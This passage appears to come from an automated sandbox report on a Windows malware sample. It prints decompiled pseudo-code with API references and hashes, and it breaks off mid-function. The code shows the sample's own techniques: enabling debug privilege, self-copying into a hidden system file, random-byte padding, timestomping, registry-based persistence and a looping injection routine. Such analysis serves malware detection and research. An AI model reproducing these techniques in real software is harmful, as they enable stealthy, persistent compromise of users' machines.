        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Virtual$Alloc$MemoryProcessProtectWrite
        • String ID:
        • API String ID: 426431698-0
        • Opcode ID: 16435dd42bd012d6eb4fd5703808211e61ec03075562024a3e2316b0ddaa140e
        • Instruction ID: 518997f5d736486df1ae1b5f13570019489d1ee803f4ecb01e32556bf148844c
        • Opcode Fuzzy Hash: 16435dd42bd012d6eb4fd5703808211e61ec03075562024a3e2316b0ddaa140e
        • Instruction Fuzzy Hash: 68517B71A00209EFDF118F94CD84BAEBBB9FF44354F148439E902A72A0D775AD50DB58
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00411622, Relevance: 7.5, APIs: 5, Instructions: 42COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00411622(WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _t9;
				int _t13;
				int _t16;
				long _t19;

				_t9 =  *0x414ad0; // 0xffffffff
				_t19 = 0;
				if(OpenProcessToken(_t9, 0x28,  &_v8) != 0) {
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					_t13 = LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					if(_t13 != 0) {
						_t16 = AdjustTokenPrivileges(_v8, 0,  &_v24, 0x10, 0, 0); // executed
						if(_t16 != 0 && GetLastError() == 0) {
							_t19 = 1;
						}
					}
					FindCloseChangeNotification(_v8); // executed
				}
				return _t19;
			}










        0x00411625
        0x00411635
        0x0041163f
        0x00411648
        0x00411650
        0x00411657
        0x0041165f
        0x0041166d
        0x00411675
        0x00411681
        0x00411681
        0x00411675
        0x00411686
        0x00411686
        0x00411690

        APIs
        • OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,?,0040ADE9,SeDebugPrivilege), ref: 00411637
        • LookupPrivilegeValueW.ADVAPI32(00000000), ref: 00411657
        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 0041166D
        • GetLastError.KERNEL32 ref: 00411677
        • FindCloseChangeNotification.KERNELBASE(?), ref: 00411686
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Token$AdjustChangeCloseErrorFindLastLookupNotificationOpenPrivilegePrivilegesProcessValue
        • String ID:
        • API String ID: 1669889876-0
        • Opcode ID: 0ff21e494fb825d6b069af88e8dedd6feb6e731155c79301bf749cd92992fbac
        • Instruction ID: df723a6c123b6986e8cd481e67e05ca2d984909c05c302a609d59009afb1c0ea
        • Opcode Fuzzy Hash: 0ff21e494fb825d6b069af88e8dedd6feb6e731155c79301bf749cd92992fbac
        • Instruction Fuzzy Hash: 0C016DB1684209AFEB00DFE4EC89BEF77BCEB00344F144025B501A2160E771DE449A68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040AB9A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040AB9A(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t10;
				void* _t12;
				signed short _t16;
				CHAR** _t17;
				struct HINSTANCE__* _t18;

				_t12 = __edx; // executed
				_t6 = LoadLibraryA(__ecx); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					L4:
					return _t18;
				}
				_t16 = 0;
				if(0 >= _a4) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t17 = _t12 + (_t16 & 0x0000ffff) * 8;
					_t10 = GetProcAddress(_t18,  *_t17);
					if(_t10 == 0) {
						break;
					}
					_t16 = _t16 + 1;
					 *(_t17[1]) = _t10;
					if(_t16 < _a4) {
						continue;
					}
					goto L4;
				}
				return 0;
			}









        0x0040ab9f
        0x0040aba1
        0x0040aba7
        0x0040abab
        0x0040abd8
        0x00000000
        0x0040abd8
        0x0040abaf
        0x0040abb6
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040abb8
        0x0040abb8
        0x0040abbb
        0x0040abc1
        0x0040abc9
        0x00000000
        0x00000000
        0x0040abce
        0x0040abcf
        0x0040abd6
        0x00000000
        0x00000000
        0x00000000
        0x0040abd6
        0x00000000

        APIs
        • LoadLibraryA.KERNELBASE(kernel32.dll), ref: 0040ABA1
        • GetProcAddress.KERNELBASE(00000000), ref: 0040ABC1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: kernel32.dll
        • API String ID: 2574300362-1793498882
        • Opcode ID: ea14971a43593a48d75dfe0d8ddf12f23ee1867f915ecc87a67753dcf9f0bee9
        • Instruction ID: ecd0fbdec9421d356c3536c92b7f4e5714e442ce6e3fd95d029d0eabbe0d0d74
        • Opcode Fuzzy Hash: ea14971a43593a48d75dfe0d8ddf12f23ee1867f915ecc87a67753dcf9f0bee9
        • Instruction Fuzzy Hash: C7F027313003085BC3209FA5AD04473B7BEEF81742341483BBA42E3140EA35A811D269
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00406874, Relevance: 40.8, APIs: 27, Instructions: 307synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 77%
        			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v5;
				int _v12;
				signed int _v13;
				long _v20;
				void* _v24;
				char _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				short _v572;
				short _v1092;
				void* _t76;
				intOrPtr _t78;
				void* _t79;
				signed int _t80;
				signed int _t83;
				intOrPtr _t84;
				intOrPtr _t90;
				signed int _t95;
				signed int _t98;
				void* _t101;
				signed int _t105;
				intOrPtr _t106;
				signed int _t107;
				intOrPtr _t108;
				void* _t119;
				signed int _t122;
				intOrPtr _t125;
				void* _t129;
				long _t142;
				intOrPtr _t150;
				void* _t151;
				intOrPtr _t154;
				intOrPtr _t156;
				intOrPtr _t158;
				signed int _t159;
				void* _t164;
				signed int _t165;
				signed int _t172;
				void* _t174;
				void* _t175;
				intOrPtr _t176;
				void* _t177;
				void* _t180;
				void* _t181;

				_t177 = __esi;
				E00407626(); // executed
				_t76 = E0040AC42(); // executed
				if(_t76 == 0) {
					return 0;
				}
				_v12 = 0;
				_t172 = GetCommandLineA();
				__eflags = _t172;
				if(_t172 == 0) {
					L11:
					_t78 =  *0x414ad4; // 0x241f5a8
					_t79 = CreateMutexW(0x4155b4, 1,  *(_t78 + 0x30)); // executed
					_v24 = _t79;
					_t80 = GetLastError();
					__eflags = _t80;
					if(_t80 != 0) {
						L48:
						__eflags = _v24;
						if(_v24 != 0) {
							CloseHandle(_v24);
						}
						E00412042(_t170, _t172);
						ExitProcess(0);
					}
					_t83 = E004067E4(); // executed
					_v5 = _t83;
					_t84 =  *0x414ad4; // 0x241f5a8
					_v20 = 0;
					_v13 = 0;
					__eflags = E0040AA0E( *((intOrPtr*)(_t84 + 0x2c)));
					if(__eflags == 0) {
						L23:
						_push(_t177);
						GetModuleFileNameW(0,  &_v1092, 0x104);
						E0040AE3C( &_v572);
						_t90 =  *0x414ad4; // 0x241f5a8
						PathCombineW( &_v572,  &_v572,  *(_t90 + 0xc));
						_t95 = lstrcmpiW( &_v1092,  &_v572);
						__eflags = _t95;
						_push( &_v572);
						if(_t95 == 0) {
							_v5 = 0;
							E0040B355();
							L38:
							__eflags = _v5;
							if(_v5 == 0) {
								_t98 =  *0x414be8; // 0x0
								_t170 =  *0x414ad4; // 0x241f5a8
								_t101 = E0040B135( *((intOrPtr*)(_t170 + (_t98 & 0x00000001 | 0x00000002) * 8))); // executed
								_t174 = _t101;
								while(1) {
									_t105 = E00407DA0(0, _t170, 0x407038 -  *0x414ca0, _t174); // executed
									__eflags = _t105;
									if(_t105 != 0) {
										break;
									}
									Sleep(0x14); // executed
								}
								while(1) {
									_t106 =  *0x414ad4; // 0x241f5a8
									_t107 = E0040AA0E( *((intOrPtr*)(_t106 + 0x28)));
									__eflags = _t107;
									if(_t107 != 0) {
										break;
									}
									Sleep(0x14);
								}
								L47:
								goto L48;
							}
							__eflags = _v13;
							if(__eflags != 0) {
								_t108 =  *0x414ad4; // 0x241f5a8
								E0040AA33(__eflags,  *((intOrPtr*)(_t108 + 0x2c)), 0xa, 0, 0, 0, 0);
							}
							goto L47;
						}
						E0040B355(); // executed
						E00410093( &_v572);
						CopyFileW( &_v1092,  &_v572, 0); // executed
						SetFileAttributesW( &_v572, 0x26); // executed
						_t119 = CreateFileW( &_v572, 0x40000000, 1, 0, 3, 0, 0); // executed
						_v12 = _t119;
						__eflags = _t119 - 0xffffffff;
						if(_t119 == 0xffffffff) {
							L36:
							SetFileAttributesW( &_v572, 0x21); // executed
							goto L38;
						}
						_t122 = SetFilePointer(_t119, 0, 0, 2); // executed
						__eflags = _t122;
						if(_t122 == 0) {
							L33:
							 *0x414b58(0,  &_v1092, 0x25, 1);
							_t125 =  *0x414ad4; // 0x241f5a8
							PathCombineW( &_v1092,  &_v1092,  *(_t125 + 0x5c));
							_t129 = CreateFileW( &_v1092, 0x80000000, 3, 0, 3, 0, 0); // executed
							_t180 = _t129;
							__eflags = _t180 - 0xffffffff;
							if(_t180 != 0xffffffff) {
								GetFileTime(_t180,  &_v36,  &_v52,  &_v44);
								SetFileTime(_v12,  &_v36,  &_v52,  &_v44); // executed
								FindCloseChangeNotification(_t180); // executed
							}
							CloseHandle(_v12);
							goto L36;
						}
						_t142 = E004102A8(0x400, 0x40) << 9;
						_v20 = _t142;
						__eflags = _t142;
						if(_t142 == 0) {
							_t175 = 0;
							__eflags = 0;
						} else {
							_t175 = E0040F14B(_t142);
							_t142 = _v20;
						}
						__eflags = _t175;
						if(_t175 == 0) {
							goto L33;
						} else {
							_t181 = 0;
							__eflags = _t142;
							if(_t142 <= 0) {
								L32:
								_t170 =  &_v20;
								WriteFile(_v12, _t175, _t142,  &_v20, 0); // executed
								FlushFileBuffers(_v12);
								E0040F15E(_t175);
								goto L33;
							} else {
								goto L31;
							}
							do {
								L31:
								 *((char*)(_t181 + _t175)) = E004102A8(E004102A8(0xff, 1), 0);
								_t142 = _v20;
								_t181 = _t181 + 1;
								__eflags = _t181 - _t142;
							} while (_t181 < _t142);
							goto L32;
						}
					}
					_t150 =  *0x414ad4; // 0x241f5a8
					_t151 = E0040AA33(__eflags,  *((intOrPtr*)(_t150 + 0x2c)), 1, 0, 0, 0, 0);
					__eflags = _v12 & 0x00000001;
					if(__eflags != 0) {
						L16:
						_t154 =  *0x414ad4; // 0x241f5a8
						_v12 = 0;
						E0040AA33(__eflags,  *((intOrPtr*)(_t154 + 0x2c)), 0xb,  &_v12,  &_v20, 0, 0);
						_t156 =  *0x414ad4; // 0x241f5a8
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						__eflags = _v5;
						if(__eflags == 0) {
							_push(3);
							_push( *((intOrPtr*)(_t156 + 0x2c)));
							E0040AA33(__eflags);
							while(1) {
								_t158 =  *0x414ad4; // 0x241f5a8
								_t159 = E0040AA0E( *((intOrPtr*)(_t158 + 0x2c)));
								__eflags = _t159;
								if(_t159 == 0) {
									break;
								}
								Sleep(0x14);
							}
							L21:
							_v13 = 1;
							__eflags = _v12;
							if(_v12 != 0) {
								E00410093(_v12);
								E0040F15E(_v12);
							}
							goto L23;
						}
						_push(9);
						_push( *((intOrPtr*)(_t156 + 0x2c)));
						E0040AA33(__eflags);
						goto L21;
					}
					__eflags = _t151 - 0x1020716;
					if(__eflags < 0) {
						goto L16;
					}
					CloseHandle(_v24);
					ExitProcess(0);
				} else {
					_t164 = E0040F637(_t172);
					_t170 =  &_v28;
					_t165 = E0040F480(_t164,  &_v28, _t172);
					__eflags = _t165;
					if(_t165 <= 0) {
						goto L11;
					}
					_t176 = _v28;
					_t172 = 0;
					__eflags = _t165;
					if(_t165 <= 0) {
						L10:
						E0040F17A(_t165, _t176);
						goto L11;
					} else {
						goto L5;
					}
					do {
						L5:
						_t170 =  *((intOrPtr*)(_t176 + _t172 * 4));
						__eflags =  *_t170 - 0x2d;
						if( *_t170 == 0x2d) {
							__eflags =  *((char*)(_t170 + 1)) - 0x66;
							if( *((char*)(_t170 + 1)) == 0x66) {
								__eflags =  *(_t170 + 2);
								if( *(_t170 + 2) == 0) {
									_t8 =  &_v12;
									 *_t8 = _v12 | 0x00000001;
									__eflags =  *_t8;
								}
							}
						}
						_t172 = _t172 + 1;
						__eflags = _t172 - _t165;
					} while (_t172 < _t165);
					goto L10;
				}
			}
















































        0x00406874
        0x0040687d
        0x00406882
        0x00406889
        0x0040688e
        0x0040688e
        0x00406893
        0x0040689c
        0x0040689e
        0x004068a0
        0x004068df
        0x004068df
        0x004068ee
        0x004068f4
        0x004068f7
        0x004068fd
        0x004068ff
        0x00406c0c
        0x00406c0c
        0x00406c0f
        0x00406c14
        0x00406c14
        0x00406c1a
        0x00406c20
        0x00406c20
        0x00406905
        0x0040690a
        0x0040690d
        0x00406912
        0x00406918
        0x00406920
        0x00406922
        0x004069ce
        0x004069ce
        0x004069dc
        0x004069e8
        0x004069ed
        0x004069fd
        0x00406a11
        0x00406a17
        0x00406a1f
        0x00406a20
        0x00406b8a
        0x00406b8d
        0x00406b92
        0x00406b92
        0x00406b95
        0x00406bb1
        0x00406bb6
        0x00406bc5
        0x00406bca
        0x00406bdb
        0x00406be7
        0x00406bec
        0x00406bee
        0x00000000
        0x00000000
        0x00406bd5
        0x00406bd5
        0x00406bfa
        0x00406bfa
        0x00406c02
        0x00406c07
        0x00406c09
        0x00000000
        0x00000000
        0x00406bf4
        0x00406bf4
        0x00406c0b
        0x00000000
        0x00406c0b
        0x00406b97
        0x00406b9a
        0x00406b9c
        0x00406baa
        0x00406baa
        0x00000000
        0x00406b9a
        0x00406a26
        0x00406a32
        0x00406a46
        0x00406a55
        0x00406a6e
        0x00406a74
        0x00406a77
        0x00406a7a
        0x00406b79
        0x00406b82
        0x00000000
        0x00406b82
        0x00406a85
        0x00406a8b
        0x00406a8d
        0x00406af9
        0x00406b05
        0x00406b0b
        0x00406b1b
        0x00406b34
        0x00406b3a
        0x00406b3c
        0x00406b3f
        0x00406b4e
        0x00406b63
        0x00406b6a
        0x00406b6a
        0x00406b73
        0x00000000
        0x00406b73
        0x00406a9b
        0x00406a9e
        0x00406aa1
        0x00406aa3
        0x00406ab1
        0x00406ab1
        0x00406aa5
        0x00406aaa
        0x00406aac
        0x00406aac
        0x00406ab3
        0x00406ab5
        0x00000000
        0x00406ab7
        0x00406ab7
        0x00406ab9
        0x00406abb
        0x00406ada
        0x00406adb
        0x00406ae4
        0x00406aed
        0x00406af4
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00406abd
        0x00406abd
        0x00406acf
        0x00406ad2
        0x00406ad5
        0x00406ad6
        0x00406ad6
        0x00000000
        0x00406abd
        0x00406ab5
        0x00406928
        0x00406936
        0x0040693b
        0x0040693f
        0x0040695a
        0x00406964
        0x0040696e
        0x00406971
        0x00406976
        0x0040697b
        0x0040697c
        0x0040697d
        0x0040697e
        0x0040697f
        0x00406982
        0x00406990
        0x00406992
        0x00406995
        0x004069a4
        0x004069a4
        0x004069ac
        0x004069b1
        0x004069b3
        0x00000000
        0x00000000
        0x0040699e
        0x0040699e
        0x004069b5
        0x004069b5
        0x004069b9
        0x004069bc
        0x004069c1
        0x004069c9
        0x004069c9
        0x00000000
        0x004069bc
        0x00406984
        0x00406986
        0x00406989
        0x00000000
        0x00406989
        0x00406941
        0x00406946
        0x00000000
        0x00000000
        0x0040694b
        0x00406952
        0x004068a2
        0x004068a4
        0x004068a9
        0x004068ac
        0x004068b1
        0x004068b3
        0x00000000
        0x00000000
        0x004068b5
        0x004068b8
        0x004068ba
        0x004068bc
        0x004068da
        0x004068da
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x004068be
        0x004068be
        0x004068be
        0x004068c1
        0x004068c4
        0x004068c6
        0x004068ca
        0x004068cc
        0x004068cf
        0x004068d1
        0x004068d1
        0x004068d1
        0x004068d1
        0x004068cf
        0x004068ca
        0x004068d5
        0x004068d6
        0x004068d6
        0x00000000
        0x004068be

        APIs
        • GetCommandLineA.KERNEL32 ref: 00406896
        • CreateMutexW.KERNELBASE(004155B4,00000001,?), ref: 004068EE
        • GetLastError.KERNEL32 ref: 004068F7
        • CloseHandle.KERNEL32(?,?,00000001,00000000,00000000,00000000,00000000,?), ref: 0040694B
        • ExitProcess.KERNEL32 ref: 00406952
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCommandCreateErrorExitHandleLastLineMutexProcess
        • String ID:
        • API String ID: 1529117804-0
        • Opcode ID: 44af3022d04b0f46c42d2671b9abcc3574491615fdb812ceeb669f2820a16da5
        • Instruction ID: f1cb11c83471a368260cfb09b9036ef456753c44cfc8c40dc57c0bed504cb708
        • Opcode Fuzzy Hash: 44af3022d04b0f46c42d2671b9abcc3574491615fdb812ceeb669f2820a16da5
        • Instruction Fuzzy Hash: 5AB184B1900218AFDF11ABA0DD89EEE7B7DEF44304F018076F206B61A1D7799D65CB29
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00406958, Relevance: 28.7, APIs: 19, Instructions: 164filesleeptimeCOMMON
        Download Yara Rule
        C-Code - Quality: 91%
        			E00406958() {
				DWORD* _t47;
				int _t52;
				signed int _t55;
				void* _t58;
				void* _t62;
				DWORD* _t63;
				void* _t64;
				DWORD* _t67;
				void* _t78;
				long _t81;
				DWORD* _t84;
				void* _t88;
				long _t101;
				struct _OVERLAPPED* _t109;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t116;
				void* _t117;
				void* _t118;

				GetModuleFileNameW(_t109, _t118 - 0x440, 0x104);
				E0040AE3C(_t118 - 0x238);
				_t47 =  *0x414ad4; // 0x241f5a8
				PathCombineW(_t118 - 0x238, _t118 - 0x238, _t47[3]);
				_t52 = lstrcmpiW(_t118 - 0x440, _t118 - 0x238);
				_push(_t118 - 0x238);
				if(_t52 == 0) {
					 *(_t118 - 1) = _t109;
					E0040B355();
					goto L16;
				} else {
					E0040B355(); // executed
					E00410093(_t118 - 0x238);
					CopyFileW(_t118 - 0x440, _t118 - 0x238, _t109); // executed
					SetFileAttributesW(_t118 - 0x238, 0x26); // executed
					_t78 = CreateFileW(_t118 - 0x238, 0x40000000, 1, _t109, 3, _t109, _t109); // executed
					 *(_t118 - 8) = _t78;
					if(_t78 == 0xffffffff) {
						L14:
						SetFileAttributesW(_t118 - 0x238, 0x21); // executed
						L16:
						if( *(_t118 - 1) == _t109) {
							_t55 =  *0x414be8; // 0x0
							_t110 =  *0x414ad4; // 0x241f5a8
							_t58 = E0040B135( *((intOrPtr*)(_t110 + (_t55 & 0x00000001 | 0x00000002) * 8))); // executed
							_t112 = _t58;
							while(1) {
								_t62 = E00407DA0(0, _t110, 0x407038 -  *0x414ca0, _t112); // executed
								__eflags = _t62;
								if(_t62 != 0) {
									break;
								}
								Sleep(0x14); // executed
							}
							while(1) {
								_t63 =  *0x414ad4; // 0x241f5a8
								_t64 = E0040AA0E(_t63[0xa]);
								__eflags = _t64;
								if(_t64 != 0) {
									break;
								}
								Sleep(0x14);
							}
							L25:
							if( *(_t118 - 0x14) != _t109) {
								CloseHandle( *(_t118 - 0x14));
							}
							E00412042(_t110, _t111);
							ExitProcess(_t109);
						}
						_t128 =  *((intOrPtr*)(_t118 - 9)) - _t109;
						if( *((intOrPtr*)(_t118 - 9)) != _t109) {
							_t67 =  *0x414ad4; // 0x241f5a8
							E0040AA33(_t128, _t67[0xb], 0xa, _t109, _t109, _t109, _t109);
						}
						goto L25;
					}
					_t81 = SetFilePointer(_t78, _t109, _t109, 2); // executed
					if(_t81 == 0) {
						L11:
						 *0x414b58(_t109, _t118 - 0x440, 0x25, 1);
						_t84 =  *0x414ad4; // 0x241f5a8
						PathCombineW(_t118 - 0x440, _t118 - 0x440, _t84[0x17]);
						_t88 = CreateFileW(_t118 - 0x440, 0x80000000, 3, _t109, 3, _t109, _t109); // executed
						_t116 = _t88;
						if(_t116 != 0xffffffff) {
							GetFileTime(_t116, _t118 - 0x20, _t118 - 0x30, _t118 - 0x28);
							SetFileTime( *(_t118 - 8), _t118 - 0x20, _t118 - 0x30, _t118 - 0x28); // executed
							FindCloseChangeNotification(_t116); // executed
						}
						CloseHandle( *(_t118 - 8));
						goto L14;
					}
					_t101 = E004102A8(0x400, 0x40) << 9;
					 *(_t118 - 0x10) = _t101;
					if(_t101 == _t109) {
						_t113 = 0;
						__eflags = 0;
					} else {
						_t113 = E0040F14B(_t101);
						_t101 =  *(_t118 - 0x10);
					}
					if(_t113 == _t109) {
						goto L11;
					} else {
						_t117 = 0;
						if(_t101 <= _t109) {
							L10:
							_t110 = _t118 - 0x10;
							WriteFile( *(_t118 - 8), _t113, _t101, _t118 - 0x10, _t109); // executed
							FlushFileBuffers( *(_t118 - 8));
							E0040F15E(_t113);
							goto L11;
						} else {
							goto L9;
						}
						do {
							L9:
							 *((char*)(_t117 + _t113)) = E004102A8(E004102A8(0xff, 1), _t109);
							_t101 =  *(_t118 - 0x10);
							_t117 = _t117 + 1;
						} while (_t117 < _t101);
						goto L10;
					}
				}
			}























        0x004069dc
        0x004069e8
        0x004069ed
        0x004069fd
        0x00406a11
        0x00406a1f
        0x00406a20
        0x00406b8a
        0x00406b8d
        0x00000000
        0x00406a26
        0x00406a26
        0x00406a32
        0x00406a46
        0x00406a55
        0x00406a6e
        0x00406a74
        0x00406a7a
        0x00406b79
        0x00406b82
        0x00406b92
        0x00406b95
        0x00406bb1
        0x00406bb6
        0x00406bc5
        0x00406bca
        0x00406bdb
        0x00406be7
        0x00406bec
        0x00406bee
        0x00000000
        0x00000000
        0x00406bd5
        0x00406bd5
        0x00406bfa
        0x00406bfa
        0x00406c02
        0x00406c07
        0x00406c09
        0x00000000
        0x00000000
        0x00406bf4
        0x00406bf4
        0x00406c0b
        0x00406c0f
        0x00406c14
        0x00406c14
        0x00406c1a
        0x00406c20
        0x00406c20
        0x00406b97
        0x00406b9a
        0x00406b9c
        0x00406baa
        0x00406baa
        0x00000000
        0x00406b9a
        0x00406a85
        0x00406a8d
        0x00406af9
        0x00406b05
        0x00406b0b
        0x00406b1b
        0x00406b34
        0x00406b3a
        0x00406b3f
        0x00406b4e
        0x00406b63
        0x00406b6a
        0x00406b6a
        0x00406b73
        0x00000000
        0x00406b73
        0x00406a9b
        0x00406a9e
        0x00406aa3
        0x00406ab1
        0x00406ab1
        0x00406aa5
        0x00406aaa
        0x00406aac
        0x00406aac
        0x00406ab5
        0x00000000
        0x00406ab7
        0x00406ab7
        0x00406abb
        0x00406ada
        0x00406adb
        0x00406ae4
        0x00406aed
        0x00406af4
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00406abd
        0x00406abd
        0x00406acf
        0x00406ad2
        0x00406ad5
        0x00406ad6
        0x00000000
        0x00406abd
        0x00406ab5

        APIs
        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 004069DC
          • Part of subcall function 0040AE3C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        • PathCombineW.SHLWAPI(?,?,?,?,?), ref: 004069FD
        • lstrcmpiW.KERNEL32(?,?,?,?), ref: 00406A11
        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,?), ref: 00406A46
        • SetFileAttributesW.KERNELBASE(?,00000026,?,?), ref: 00406A55
        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406A6E
        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,?), ref: 00406A85
        • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,00000040,?,?), ref: 00406AE4
        • FlushFileBuffers.KERNEL32(?,?,?), ref: 00406AED
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,?,?), ref: 00406B05
        • PathCombineW.SHLWAPI(?,?,?,?,?), ref: 00406B1B
        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?), ref: 00406B34
        • GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 00406B4E
        • SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 00406B63
        • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 00406B6A
        • CloseHandle.KERNEL32(?,?,?), ref: 00406B73
        • SetFileAttributesW.KERNELBASE(?,00000021,?,?), ref: 00406B82
        • Sleep.KERNELBASE(00000014,-0000DC68,00000000,0241F5A8,?,?,?), ref: 00406BD5
        • Sleep.KERNEL32(00000014,?,-0000DC68,00000000,?,?), ref: 00406BF4
        • CloseHandle.KERNEL32(?), ref: 00406C14
        • ExitProcess.KERNEL32 ref: 00406C20
          • Part of subcall function 0040B355: RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,?), ref: 0040B387
          • Part of subcall function 0040B355: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0040B3AA
          • Part of subcall function 0040B355: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0040B3E3
          • Part of subcall function 0040B355: StrCmpNIW.SHLWAPI(00000002,?,?,?,?,00000000,?), ref: 0040B40D
          • Part of subcall function 0040B355: RegCloseKey.KERNELBASE(?,?,?,00000000,?), ref: 0040B48F
          • Part of subcall function 00410093: SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
          • Part of subcall function 00410093: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$ClosePath$AttributesCreate$CombineFolderHandleQuerySleepSpecialTimeValue$AllocateBuffersChangeCopyDeleteExitFindFlushHeapModuleNameNotificationPointerProcessWritelstrcmpi
        • String ID:
        • API String ID: 33030036-0
        • Opcode ID: 7a25980ef5ba6dc2ad4c6a38649dd5471911fb9501acee7d04876079f88a8e04
        • Instruction ID: 25290067b2d062b729b8758c824f3da7e3c44a44cb3254c285820f99a9c9abe9
        • Opcode Fuzzy Hash: 7a25980ef5ba6dc2ad4c6a38649dd5471911fb9501acee7d04876079f88a8e04
        • Instruction Fuzzy Hash: 785153B2900219AFDB11ABE0DC88EEE777CEB44304F054176F206F6190DB789E95CB69
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040B355, Relevance: 12.1, APIs: 8, Instructions: 136registrystringCOMMON
        Download Yara Rule
        C-Code - Quality: 97%
        			E0040B355(WCHAR* _a4) {
				int _v8;
				void* _v12;
				int _v16;
				intOrPtr _t45;
				long _t46;
				intOrPtr _t48;
				intOrPtr _t52;
				int _t55;
				intOrPtr _t59;
				signed int _t61;
				intOrPtr _t71;
				signed int _t72;
				short _t74;
				int _t76;
				char* _t77;
				WCHAR* _t82;
				int _t84;
				char* _t85;
				signed int _t87;
				signed int _t88;

				_t76 = 0;
				_t84 = E0040F649(_a4);
				_t45 =  *0x414ad4; // 0x241f5a8
				_v16 = _t84;
				_t46 = RegCreateKeyExW(0x80000002,  *(_t45 + 0x3c), 0, 0, 0, 3, 0,  &_v12, 0); // executed
				if(_t46 != 0) {
					L19:
					_t39 = _t84 + 2; // 0x2
					_t48 =  *0x414ad4; // 0x241f5a8
					_t76 = E0040861B(0x80000001,  *((intOrPtr*)(_t48 + 0x40)),  *((intOrPtr*)(_t48 + 0x44)), 1, _a4, _t84 + _t39);
				} else {
					_t52 =  *0x414ad4; // 0x241f5a8
					_v8 = 0;
					RegQueryValueExW(_v12,  *(_t52 + 0x44), 0, 0, 0,  &_v8); // executed
					_t55 = _v8 + 0xa + _t84 * 2;
					_v8 = _t55;
					if(_t55 != 0) {
						_t85 = E0040F14B(_t55);
						if(_t85 != 0) {
							_t59 =  *0x414ad4; // 0x241f5a8
							RegQueryValueExW(_v12,  *(_t59 + 0x44), 0, 0, _t85,  &_v8); // executed
							_t77 = _t85;
							_t82 = _t85;
							while(1) {
								_t61 =  *_t77 & 0x0000ffff;
								if(_t61 == 0 || _t61 == 0x2c) {
									goto L6;
								}
								L9:
								if( *_t77 == 0) {
									_t87 = E0040F649(_t85);
									if(_t87 > 0 && _t85[_t87 * 2 - 2] != 0x2c) {
										_t74 = 0x2c;
										 *(_t85 + _t87 * 2) = _t74;
										_t87 = _t87 + 1;
									}
									lstrcpyW(_t85 + _t87 * 2, _a4);
									_t88 = _t87 + _v16;
									lstrcpyW(_t85 + _t88 * 2, ",");
									_t71 =  *0x414ad4; // 0x241f5a8
									_t72 = RegSetValueExW(_v12,  *(_t71 + 0x44), 0, 1, _t85, _t88 + _t88 + 4); // executed
									asm("sbb bl, bl");
									_t76 =  ~_t72 + 1;
								} else {
									_t77 =  &(_t77[2]);
									continue;
								}
								L16:
								E0040F15E(_t85);
								goto L17;
								L6:
								if(_t77 - _t82 >> 1 != _v16 || StrCmpNIW(_t82, _a4, _v16) != 0) {
									_t20 =  &(_t77[2]); // 0x4
									_t82 = _t20;
									goto L9;
								} else {
									_t76 = 1;
								}
								goto L16;
							}
						}
					}
					L17:
					RegCloseKey(_v12); // executed
					if(_t76 == 0) {
						_t84 = _v16;
						goto L19;
					}
				}
